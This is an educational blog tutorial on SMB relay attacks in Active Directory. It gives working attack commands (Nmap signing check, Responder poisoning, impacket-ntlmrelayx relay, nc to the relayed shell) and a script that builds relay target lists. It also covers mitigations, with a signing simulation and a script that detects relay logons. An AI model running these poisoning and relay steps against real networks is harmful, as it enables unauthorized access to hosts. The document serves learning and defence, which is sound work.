Exploring Common Active Directory Vulnerabilities and Exploits: Day 2 – SMB Relay

SMB Relay, What is it?

SMB Relay is an attack on NTLM authentication over the Server Message Block (SMB) protocol, the protocol Windows uses for file sharing, printing and remote administration. The attacker gets a victim machine to authenticate to a host under the attacker's control and, instead of cracking what it receives, forwards each NTLM message to a legitimate server in real time, ending up with an authenticated session on that server as the victim. The weakness is less in SMB itself than in NTLM's challenge-response design: unless the session is signed with a key the real client negotiated, the server cannot tell a forwarded authentication from a direct one.

Attack Requirements:

  • A target that does not require SMB signing: with signing merely enabled (the long-standing default on workstations and member servers) or disabled, the server accepts an unsigned session set up by the relayed authentication. Domain controllers require signing by default, so they are normally not relay targets over SMB.
  • Network access: the attacker must be on the same broadcast segment as the victim to answer its LLMNR or NBT-NS queries, or otherwise be able to make the victim connect to an attacker-controlled host.
  • A useful account and a different target: the relayed user should have rights on the target (local administrator, for command execution or credential dumping), and the target must be a machine other than the one the authentication came from, because relaying an authentication back to its originating host has been blocked since MS08-068.

How SMB Relay Attack Works:

  1. Interception: The attacker gets the victim to connect to a machine they control, most often by answering the victim's LLMNR or NBT-NS name-resolution broadcasts (Responder), or by ARP spoofing to sit between client and server as a Man-in-the-Middle (MitM).
  2. Capture of the authentication: When the victim connects and starts NTLM authentication, the attacker receives the NTLM NEGOTIATE and AUTHENTICATE messages. What arrives is not the user's password hash but an NTLMv2 challenge-response (Net-NTLMv2), computed from the NT hash and a server challenge. Kerberos does not produce a forwardable exchange of this kind, which is why the attack targets NTLM.
  3. Relay: Instead of cracking the response offline, the attacker opens its own connection to a different server, passes that server's challenge back to the victim, and forwards the victim's response to the server, while the victim still believes it is talking to the host it asked for.
  4. Gain access: If the target does not require signing, it accepts the relayed authentication and the attacker holds a session as the victim, with whatever rights the victim has there; local administrator rights mean full compromise of that host.

SMB Relay Example Attack flow:

Let's walk through a practical SMB Relay attack, from finding a target that does not require signing to getting a session on it with a relayed authentication. It shows concretely why the mitigations at the end of this post matter.

1. Assessing Target Vulnerability with Nmap

Before poisoning anything, check which hosts are actually relayable. The Nmap script smb2-security-mode connects to port 445, negotiates SMB2 and reports whether the server requires message signing; it does not test LLMNR or NBT-NS, which is a separate step.

Run the following Nmap command against the target:

nmap --script=smb2-security-mode.nse -p445 <target-ip>

Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 13:07 EDT
Nmap scan report for <target-ip>
Host is up (0.090s latency).
PORT     STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds

2. Setting Up Responder to Intercept SMB Traffic

As with LLMNR poisoning, the next step is Responder, which answers the LLMNR, NBT-NS and mDNS name queries that nobody else answers and so redirects victims to the attacker. For a relay we do not want Responder to handle the NTLM authentication itself, so before starting it set SMB = Off and HTTP = Off in Responder.conf (/etc/responder/Responder.conf on current Kali); those connections must reach ntlmrelayx instead.

On the attacker’s machine, run the following command:

sudo responder -I tun0 -dwPv
  • -I tun0: the network interface to listen on (tun0 is typical for a lab reached over a VPN; on a directly connected network use the LAN interface, such as eth0).
  • -d: answer DHCP broadcast requests in current Responder versions (older versions used -d for NBT-NS domain queries).
  • -w: start the rogue WPAD proxy server.
  • -P: force NTLM authentication on that proxy.
  • -v: verbose output.

Responder

Responder now waits for LLMNR or NBT-NS queries. Windows sends these whenever a name cannot be resolved through DNS, for example when a user mistypes a share name or a mapped drive points to a host that no longer exists.

3. Interception of the Authentication Request

Now suppose a victim on the network tries to access a share that doesn't exist, such as \\nonexistent-share, or mistypes the shared folder name. DNS resolution fails, so their machine broadcasts an LLMNR or NBT-NS query asking whether anyone on the segment knows that name.

SMB interception connection

Responder answers that query with the attacker's IP address. The victim then opens an SMB connection to the attacker and authenticates with NTLM, sending its NTLMv2 challenge-response. With Responder's SMB server left on, this is the point where Responder prints the captured NTLMv2-SSP hash; with it off, as configured above, the connection is handed to ntlmrelayx instead.

4. Launching an SMB Relay Attack

Once the victim's authentication arrives at the attacker, it can be relayed to a vulnerable server (one with SMB signing enabled but not required) while the exchange is still in progress. A captured Net-NTLMv2 response on its own cannot be replayed later or used for pass-the-hash, because it is bound to one server challenge; it has to be relayed live, which is what ntlmrelayx from the Impacket suite automates.

sudo impacket-ntlmrelayx -tf target.txt -smb2support -i
  • -tf target.txt: a file with the target IPs or hostnames, one per line, that were found not to require signing. ntlmrelayx starts its own SMB and HTTP listeners and relays each incoming authentication to the next target in the list.
  • -smb2support: makes the listener speak SMB2, without which modern clients (SMB1 has been disabled by default since Windows 10 1709) will not connect.
  • -i: on a successful relay, opens an interactive SMB client shell to the target on a local TCP port, instead of the default action, which for an administrative account is dumping the local SAM hashes.

Now, as soon as a user mistypes a share or connects to a name that does not resolve, Responder points them at the attacker, the victim's SMB connection lands on ntlmrelayx, and ntlmrelayx relays the authentication to the server listed in target.txt. If that server accepts it, the attacker has a session there as the victim, and if the victim is a local administrator on it, full control of the host.
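The target list ntlmrelayx reads with -tf should come straight from the Nmap scan in step 1, so the relay is only ever attempted against hosts that do not require signing. The following script is an added example, not part of the original post: it parses Nmap XML output (the scan from step 1 saved with -oX, e.g. nmap --script smb2-security-mode -p445 -oX scan.xml 10.10.10.0/24), keeps the hosts whose smb2-security-mode result says signing is not required or disabled, and prints them in the one-per-line format target.txt needs. The XML embedded below is a constructed sample in the shape of Nmap's output, not a real scan; the IP addresses are made up.

```python
"""Build the ntlmrelayx -tf target list from an Nmap smb2-security-mode scan.

Added example, not part of the original post. Assumes the scan was saved with
-oX; the XML below is a constructed sample in the shape of Nmap's output.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: three hosts answered the script (one requires signing),
# one host did not run it at all.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/><address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode"
      output="&#10;  3:1:1: &#10;    Message signing enabled but not required"/></hostscript></host>
  <host><status state="up"/><address addr="10.10.10.10" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode"
      output="&#10;  3:1:1: &#10;    Message signing enabled and required"/></hostscript></host>
  <host><status state="up"/><address addr="10.10.10.20" addrtype="ipv4"/>
    <hostscript><script id="smb2-security-mode"
      output="&#10;  3:1:1: &#10;    Message signing enabled but not required"/></hostscript></host>
  <host><status state="up"/><address addr="10.10.10.30" addrtype="ipv4"/></host>
</nmaprun>
"""


def signing_status(host):
    """Return the smb2-security-mode output text for a <host>, or None if the
    script produced nothing for it."""
    for script in host.iter("script"):
        if script.get("id") == "smb2-security-mode":
            return script.get("output", "")
    return None


def relay_targets(xml_text, exclude=()):
    """IPs whose SMB server accepts an unsigned session: the script reported
    signing as 'not required' or 'disabled'. Hosts in `exclude` are skipped,
    e.g. the attacker's own address, or the host the authentication will come
    from, which cannot be relayed to itself (MS08-068)."""
    root = ET.fromstring(xml_text)
    targets = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        status = signing_status(host)
        if status is None or ip in exclude:
            continue
        text = status.lower()
        if "not required" in text or "disabled" in text:
            targets.append(ip)
    return targets


def targets_file(xml_text, exclude=()):
    """Contents for target.txt: one target per line with a trailing newline."""
    return "".join(ip + "\n" for ip in relay_targets(xml_text, exclude))


if __name__ == "__main__":
    # usage: python3 relay_targets.py scan.xml [ip_to_exclude ...] > target.txt
    # With no arguments it runs on the constructed sample above.
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    sys.stdout.write(targets_file(xml_text, exclude=set(sys.argv[2:])))
```

Matching on the output text rather than on Nmap's structured table keeps the script working across Nmap versions, which have changed how the dialect key is printed; the substring check covers both the "enabled but not required" and the "disabled" wordings, and both states are relayable.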

smb relay in action

We can see that the relay succeeded and ntlmrelayx has opened an SMB client shell to the target, bound to 127.0.0.1:11000, so let's connect to it with netcat (nc 127.0.0.1 11000).

shell

From here we can browse and write to the target's shares, including ADMIN$ and C$ if the relayed account is a local administrator. Running ntlmrelayx without -i would instead dump the target's SAM hashes by default, and -c runs a command of our choice on it.

Mitigation Strategies for SMB Relay Attacks

Implement SMB Signing on All Devices

SMB signing requires every SMB packet to carry a signature computed with the session key negotiated during authentication. A relay attacker sees the NTLM messages go past but never learns that key, because it is derived from the user's NT hash, which only the client and the server (or domain controller) hold. Once signing is required, a relayed session is authenticated but useless: the attacker cannot produce a valid signature for a single request on it, and the server discards unsigned or badly signed packets.

  • Pro: Stops the attack on every host where signing is required, not merely enabled; "enabled but not required" is exactly the state Nmap flagged above and is still relayable. Domain controllers already require it, and Windows 11 24H2 and Windows Server 2025 require it by default on both client and server, so the work is mostly on older workstations and member servers (Group Policy: "Microsoft network server: Digitally sign communications (always)").
  • Con: Signing adds CPU cost per packet and reduces file-transfer throughput, noticeably on older hardware and very busy file servers. Third-party SMB implementations such as NAS appliances and printers must support it too, or they stop working once clients insist on signed sessions.
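To make the "no session key" argument concrete, here is an added example (not code from the original post) that models the two halves of an NTLMv2 authentication and an SMB 2.0.2-style signature check, then runs a relay through it with signing off and with signing required. It follows the MS-NLMP definitions (ResponseKeyNT, NTProofStr, SessionBaseKey) and MS-SMB2 dialect 2.0.2 signing (HMAC-SHA256 with the session key, truncated to 16 bytes), but simplifies: the NTLMSSP key-exchange step is not modelled, so the session key is the SessionBaseKey directly, and the NT hash, server challenge and client blob are constructed constants rather than values from a real password or a real exchange.

```python
"""Why required signing defeats the relay: the relay sees every NTLM message
on the wire but never the session key. Added example, not from the original
post; simplified from MS-NLMP (NTLMv2) and MS-SMB2 (dialect 2.0.2 signing).
All key material below is constructed.
"""
import hashlib
import hmac

# Constructed: what the target stores for the user. A real NT hash is
# MD4(UTF-16LE(password)); the value here is arbitrary.
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
USER, DOMAIN = "jsmith", "CORP"


def ntowf_v2(nt_hash, user, domain):
    """ResponseKeyNT = HMAC-MD5(NThash, UTF-16LE(upper(user) + domain))."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def client_respond(nt_hash, user, domain, server_challenge, blob):
    """Victim side: NtChallengeResponse = NTProofStr || blob, plus the
    SessionBaseKey that stays on the client."""
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    session_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + blob, session_key


def server_verify(nt_hash, user, domain, server_challenge, nt_response):
    """Target side: recompute NTProofStr from the stored hash; on a match
    return the session key it will use for signing, else None."""
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof, blob = nt_response[:16], nt_response[16:]
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    if not hmac.compare_digest(expected, nt_proof):
        return None
    return hmac.new(key, nt_proof, hashlib.md5).digest()


def smb2_sign(session_key, message):
    """SMB 2.0.2 signature: HMAC-SHA256(SessionKey, message) truncated to 16 bytes."""
    return hmac.new(session_key, message, hashlib.sha256).digest()[:16]


def simulate_relay(require_signing):
    """Relay the victim's authentication to the target and report whether the
    attacker can then use the session."""
    # Target's challenge; the attacker forwards it to the victim unchanged.
    server_challenge = bytes.fromhex("0123456789abcdef")
    # NTLMv2 'temp' blob (constructed: response type, timestamp, client challenge).
    blob = bytes.fromhex("0101000000000000" "00d0a1b2c3d4e5f6" "a1b2c3d4e5f60718" "00000000")
    # 1. Victim answers the forwarded challenge; its response goes on the wire,
    #    its session key does not.
    nt_response, victim_key = client_respond(NT_HASH, USER, DOMAIN, server_challenge, blob)
    # 2. Attacker forwards the response; the target accepts it as jsmith.
    server_key = server_verify(NT_HASH, USER, DOMAIN, server_challenge, nt_response)
    authenticated = server_key is not None
    # 3. Attacker tries to use the session, e.g. connect to ADMIN$.
    request = b"SMB2 TREE_CONNECT \\\\target\\ADMIN$"
    if not require_signing:
        return {"authenticated": authenticated, "request_accepted": authenticated,
                "keys_match": victim_key == server_key}
    # Signing required: the attacker only holds wire values (challenge and
    # response), so any key it derives from them is not the session key.
    attacker_key = hashlib.md5(server_challenge + nt_response).digest()
    forged = smb2_sign(attacker_key, request)
    accepted = hmac.compare_digest(forged, smb2_sign(server_key, request))
    return {"authenticated": authenticated, "request_accepted": accepted,
            "keys_match": victim_key == server_key}


if __name__ == "__main__":
    print("signing not required:", simulate_relay(False))
    print("signing required:    ", simulate_relay(True))
```

The point the second run makes is that authentication still succeeds when signing is required; the relay is not detected at the NTLM layer. It is the first signed request that fails, because victim and target share a key the attacker cannot reconstruct from anything that crossed the wire.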

Disable NTLM Authentication on the Network

Disabling NTLM forces clients and servers to use Kerberos, which authenticates with tickets rather than a forwardable challenge-response and is therefore not affected by SMB relay.

  • Pro: Removes the attack surface entirely, since SMB relay depends on intercepting an NTLM exchange.
  • Con: Windows falls back to NTLM whenever Kerberos cannot be used, for example when a host is addressed by IP rather than name, when clocks drift beyond the five-minute tolerance, or when a service has no SPN, so NTLM is rarely gone in practice. Use the "Network security: Restrict NTLM" audit policies to find remaining NTLM use before blocking it, and keep monitoring afterwards so fallback does not quietly reopen the hole.

Implement Account Tiering

Account tiering separates accounts by privilege (domain admin, server admin, workstation user) and restricts each tier's accounts to logging on only at the systems of that tier. This limits what a compromised credential is good for, and makes it less likely that a high-privilege account ever authenticates to a machine an attacker can relay from.

  • Pro: Domain admin credentials are only ever used on domain controllers and other tier-0 systems, so relaying a workstation user or a server admin cannot be turned into domain-wide access, and lateral movement is contained within a tier.
  • Con: Enforcement is hard. It requires separate accounts per tier, logon restrictions (Group Policy "Deny log on" rights or Authentication Policies) and a change in how administrators work, and users accustomed to broad access will push back.

Apply Local Admin Restrictions

Restricting local administrator rights means removing users from the local Administrators group on their own workstations and keeping ordinary domain users out of that group on servers. It prevents unauthorized software installation and, for this attack in particular, makes a relayed account far less valuable: ntlmrelayx can only dump SAM or execute commands on the target if the relayed user is a local administrator there.

  • Pro: Lateral movement is much harder. A relayed or stolen credential gives the attacker only the access that user legitimately has on the target, which for most accounts is a share or two rather than the whole host.
  • Con: More service desk tickets, since tasks users used to do themselves (installing software, changing drivers) now need support, and frustration from users who genuinely need elevation for their work; those cases need a managed path such as a separate admin account or just-in-time elevation rather than a permanent exception.

Monitor Network Traffic for Anomalies

Continuous monitoring of authentication events and SMB traffic lets you catch an attack while it is in progress rather than after the fact, and gives you something concrete to check when an LLMNR or NBT-NS poisoning alert fires.

  • Pro: Early detection limits the damage while a breach is under way. On the relay target, Security event 4624 (logon type 3, authentication package NTLM) normally records the victim's computer name in the Workstation Name field, taken from the forwarded NTLM message, but the attacker's address as the Source Network Address; that mismatch, or one source address authenticating as many different users, is the signature to alert on. LLMNR/NBT-NS answers coming from a host that is not a name server, and SMB sessions between workstations, are worth alerting on as well.
  • Con: It costs money and people: monitoring tools, log storage, and analysts to tune rules and chase false positives. An alert nobody acts on is worthless, so this only helps if the incident response process behind it is real.
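As an added example (not code from the original post), here is the detection logic described above run over a handful of constructed 4624 events, the kind you would get from the relay target's Security log via wevtutil or an EVTX parser. The field names (TargetUserName, WorkstationName, IpAddress, LogonType, AuthenticationPackageName) follow the EventData of event 4624; the asset inventory mapping computer names to expected addresses, the IP addresses and the user names are all made up for the example.

```python
"""Spot the shape an SMB relay leaves in the target's Security log.

Added example, not from the original post. On the relay target, event 4624
with LogonType 3 and AuthenticationPackageName NTLM normally carries the
victim's computer name in WorkstationName (from the forwarded NTLM
AUTHENTICATE message) but the attacker's address in IpAddress (the TCP
peer). Inventory, events and addresses below are constructed.
"""
from collections import defaultdict

# Constructed asset inventory: computer name -> expected source address.
INVENTORY = {"WS-JSMITH": "10.10.10.50", "WS-ALICE": "10.10.10.51", "SRV-BUILD": "10.10.10.5"}

# Constructed 4624 events as recorded on the relay target SRV-FILES.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jsmith", "WorkstationName": "WS-JSMITH", "IpAddress": "10.10.10.50"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "alice", "WorkstationName": "WS-ALICE", "IpAddress": "10.10.10.51"},
    # Relay: jsmith's workstation name, but the connection came from 10.10.10.99.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jsmith", "WorkstationName": "WS-JSMITH", "IpAddress": "10.10.10.99"},
    # Same attacker host relaying a second victim shortly after.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS-ALICE", "IpAddress": "10.10.10.99"},
    # Console logon: not a network logon, so not relay-relevant.
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "admin", "WorkstationName": "SRV-FILES", "IpAddress": "-"},
    # NTLM logon naming a machine the inventory does not know: cannot be
    # verified automatically, so it is surfaced for review.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "bob", "WorkstationName": "LAPTOP-7", "IpAddress": "10.10.10.77"},
]


def ntlm_network_logons(events):
    """Only network logons (type 3) that used NTLM can be relayed sessions."""
    return [e for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM"]


def workstation_mismatches(events, inventory):
    """NTLM network logons whose source address is not the address the named
    workstation should have. Returns (user, workstation, source_ip, reason)."""
    findings = []
    for e in ntlm_network_logons(events):
        name, ip = e["WorkstationName"], e["IpAddress"]
        expected = inventory.get(name)
        if expected is None:
            findings.append((e["TargetUserName"], name, ip, "workstation not in inventory"))
        elif expected != ip:
            findings.append((e["TargetUserName"], name, ip, f"expected {expected}"))
    return findings


def multi_identity_sources(events, threshold=2):
    """Source addresses that authenticated over NTLM as at least `threshold`
    distinct users: one relay host serving several poisoned victims."""
    users = defaultdict(set)
    for e in ntlm_network_logons(events):
        users[e["IpAddress"]].add(e["TargetUserName"])
    return sorted(ip for ip, seen in users.items() if len(seen) >= threshold)


if __name__ == "__main__":
    for finding in workstation_mismatches(SAMPLE_EVENTS, INVENTORY):
        print("mismatch:", finding)
    print("multi-identity sources:", multi_identity_sources(SAMPLE_EVENTS))
```

The inventory lookup is the part that needs care in production: DHCP churn and VPN pools will produce mismatches that are not attacks, so feed it from a source that tracks current leases (DHCP logs or the endpoint agent) rather than a static list, and treat the "not in inventory" finding as a data-quality signal as much as a security one. The multi-identity check is the more robust of the two, since a single source address that authenticates as several different users over NTLM within a short window is rare on a healthy network.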
